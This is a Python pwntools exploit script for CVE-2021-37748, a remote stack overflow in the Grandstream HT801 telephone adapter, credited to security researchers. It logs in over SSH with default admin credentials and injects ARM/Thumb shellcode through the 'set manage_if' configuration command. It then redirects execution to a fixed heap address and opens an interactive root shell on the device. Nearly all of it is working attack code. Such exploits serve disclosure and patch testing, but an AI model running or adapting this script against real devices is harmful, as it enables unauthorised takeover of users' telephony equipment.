CVE-2021-37748-path1-ssh.py

'''
CVE-2021-37748 Grandstream HT801 ATA remote stack overflow.

Tested on:
1.0.27.2
1.0.25.5

Adam Simuntis <adam.simuntis(at)secforce.com>
Mindaugas Slusnys <mindaugas.slusnys(at)secforce.com>
'''
from pwn import *

IP='192.168.1.128'
PASS='admin'

def send_payload(payload):
    p.sendlineafter(b'CONFIG> ',b'set manage_if '+payload)
    p.recv()

s = ssh(host=IP,user='admin',password=PASS,level='error')
p = s.system(None)

# Enter CONFIG>
p.sendlineafter(b'GS> ',b'config') 

# ARM926EJ-S rev 5 (v5l) execve("/bin/sh","/bin/sh",0)
context.arch='arm'
sc = b""
sc += asm('add r4,pc,#1')
sc += asm('bx r4')

# Switch context
context.arch='thumb' 
sc += asm("""
mov r0, pc;
adds r0,#11;
str r0,[sp,#4];
add r1,sp,#4;
eors r2,r2,r2;
movs r7,#11;
svc 1;
cmp r7,#47;
ldr r2,[r4,#20];
cmp r7,#110;
ldr r3,[r6,#4]
""")

payload = b'A'*134 + sc

# Data will be allocated at the static address on the RWX heap for requests larger than 100 bytes. 
log.info("Forcing allocation on the Heap.")
send_payload(payload)

payload = b'B'*52 + p32(0x16098)
log.info("Shellcode len: %d",len(sc))
send_payload(payload)

p.sendlineafter(b'CONFIG> ',b'exit')
# Trigger
p.sendlineafter(b'GS> ',b'status') 

# Catch garbage
p.sendlineafter(b'#',b'') 

p.interactive()